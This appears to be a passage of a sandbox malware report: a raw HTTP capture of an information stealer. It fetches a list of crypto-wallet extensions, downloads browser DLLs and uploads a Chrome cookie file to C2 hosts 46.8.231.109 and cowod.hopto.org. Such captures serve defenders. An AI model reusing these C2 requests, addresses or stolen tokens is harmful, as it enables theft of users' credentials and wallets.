                                                                                                                                                                                                                                          Oct 2, 2024 14:44:09.503998995 CEST1236INData Raw: 62 32 4a 35 66 47 70 75 61 32 56 73 5a 6d 46 75 61 6d 74 6c 59 57 52 76 62 6d 56 6a 59 57 4a 6c 61 47 46 73 62 57 4a 6e 63 47 5a 76 5a 47 70 74 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 72 61 6d 31 76 62 32
                                                                                                                                                                                                                                          Data Ascii: b2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3wxfDB8MHxCeW9uZXxubGdiaGRmZ2RoZ2JpYW1mZGZtYmlrY2RnaGlkb2FkZHwxfDB8MHxPbmVLZXl8am5tYm9iam1obG5nb2VmYWlvamZsamNraWxoaGxoY2p8MXw
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:09.504009962 CEST1236INData Raw: 66 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 59 6d 68 6e 61 47 39 68 62 57 46 77 59 32 52 77 59 6d 39 6f 63 47 68 70 5a 32 39 76 62 32 46 6b 5a 47 6c 75 63 47 74 69 59 57 6c 38 4d 58 77 77 66 44 42 38 51 58 56 30 61 48 6c 38 5a 32
                                                                                                                                                                                                                                          Data Ascii: fEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGlkZ29iZGRmZmZsYWx8MXwwfDB8R0F1dGggQXV0aGVudGljYXRvcnxpbGdjbmh
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:09.504019976 CEST1236INData Raw: 61 6d 6c 72 59 57 70 6f 5a 6d 4a 76 62 57 68 73 62 57 31 76 62 47 78 77 61 47 4e 68 5a 48 77 78 66 44 42 38 4d 48 78 53 59 57 6c 75 59 6d 39 33 49 46 64 68 62 47 78 6c 64 48 78 76 63 47 5a 6e 5a 57 78 74 59 32 31 69 61 57 46 71 59 57 31 6c 63 47
                                                                                                                                                                                                                                          Data Ascii: amlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXw
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:09.504772902 CEST716INData Raw: 61 48 4a 76 62 57 6c 31 62 58 78 6a 61 57 39 71 62 32 4e 77 61 32 4e 73 5a 6d 5a 73 62 32 31 69 59 6d 4e 6d 61 57 64 6a 61 57 70 71 59 32 4a 72 62 57 68 68 5a 6e 77 78 66 44 42 38 4d 48 78 4e 59 57 64 70 59 79 42 46 5a 47 56 75 49 46 64 68 62 47
                                                                                                                                                                                                                                          Data Ascii: aHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21maGViZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJ
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:09.916243076 CEST467OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----IIIEBAAFBFBAKFIDBAFH
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 268
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 42 41 41 46 42 46 42 41 4b 46 49 44 42 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 41 41 46 42 46 42 41 4b 46 49 44 42 41 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 41 41 46 42 46 42 41 4b 46 49 44 42 41 46 48 2d 2d 0d 0a
                                                                                                                                                                                                                                          Data Ascii: ------IIIEBAAFBFBAKFIDBAFHContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------IIIEBAAFBFBAKFIDBAFHContent-Disposition: form-data; name="message"fplugins------IIIEBAAFBFBAKFIDBAFH--
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:10.094665051 CEST335INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:10 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          Content-Length: 108
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                                                                                                          Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:10.206748009 CEST200OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----FIDAFCAFCBKECBGCFIIJ
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 7431
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:10.206943035 CEST7431OUTData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 41 46 43 41 46 43 42 4b 45 43 42 47 43 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38
                                                                                                                                                                                                                                          Data Ascii: ------FIDAFCAFCBKECBGCFIIJContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------FIDAFCAFCBKECBGCFIIJContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:10.424506903 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:10 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:10.432348967 CEST91OUTGET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:10.604526997 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:10 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
                                                                                                                                                                                                                                          ETag: "10e436-5e7eeebed8d80"
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Content-Length: 1106998
                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:10.604547977 CEST1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                                                                                                                                                                          Data Ascii: #N@B/81s:<R@B/92P @B
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:10.604559898 CEST1236INData Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26
                                                                                                                                                                                                                                          Data Ascii: tu.|$\$4$|$\$4$du1Hga[^_]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:11.502125025 CEST950OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHD
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 751
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: ------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3LWdUY1dxSHZadlpiYWZPcGtxUnkwZEx5WUc5QWpQMnZiVUJvbWFybmM5cGNaVmxoSGtVZVVhV011ckQwR0dYeVcwNV9CXzFJeVVOWUVFTG15cVJnCi5nb29nbGUuY29tCVRSVUUJLwlGQUxTRQkxNjk5MDcxNjQwCTFQX0pBUgkyMDIzLTEwLTA1LTA2Cg==------BGCAAFHIEBKJKEBFIEHD--
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:11.707263947 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:11 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=93
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:11.805661917 CEST562OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----GHCGDAFCFHIDBGDHCFCB
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 363
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: ------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="file"------GHCGDAFCFHIDBGDHCFCB--
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:12.012675047 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:11 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=92
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:12.882883072 CEST562OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----EHCAEGDHJKFHJKFIJKJE
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 363
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 34 33 37 38 36 35 65 66 31 39 36 39 61 38 66 39 39 30 64 33 61 31 30 39 61 39 31 66 31 34 37 66 61 64 30 35 32 39 62 32 31 35 64 38 30 31 61 39 66 33 63 33 39 37 61 33 34 61 30 37 66 65 63 61 33 65 34 37 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: ------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="token"f8437865ef1969a8f990d3a109a91f147fad0529b215d801a9f3c397a34a07feca3e4715------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="file"------EHCAEGDHJKFHJKFIJKJE--
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:13.089396000 CEST202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:12 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=91
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:13.525250912 CEST91OUTGET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:13.698069096 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:13 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                          ETag: "a7550-5e7ebd4425100"
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Content-Length: 685392
                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:14.446218014 CEST91OUTGET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:14.618808031 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:14 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                                                                                                                                                                          ETag: "94750-5e7ebd4425100"
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Content-Length: 608080
                                                                                                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          12192.168.2.65858445.132.206.251806208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:10.184294939 CEST281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BAAAKJDAAFBAAKEBAAKF
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: cowod.hopto.org
                                                                                                                                                                                                                                          Content-Length: 3189
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:10.184294939 CEST3189OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 41 41 4b 4a 44 41 41 46 42 41 41 4b 45 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 34 65 64 66
                                                                                                                                                                                                                                          Data Ascii: ------BAAAKJDAAFBAAKEBAAKFContent-Disposition: form-data; name="token"3b4edf816ad3f3cea996e5aa9b301ca0------BAAAKJDAAFBAAKEBAAKFContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------BAAAKJDAAFBAAK
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:10.960302114 CEST188INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:10 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Content-Length: 0
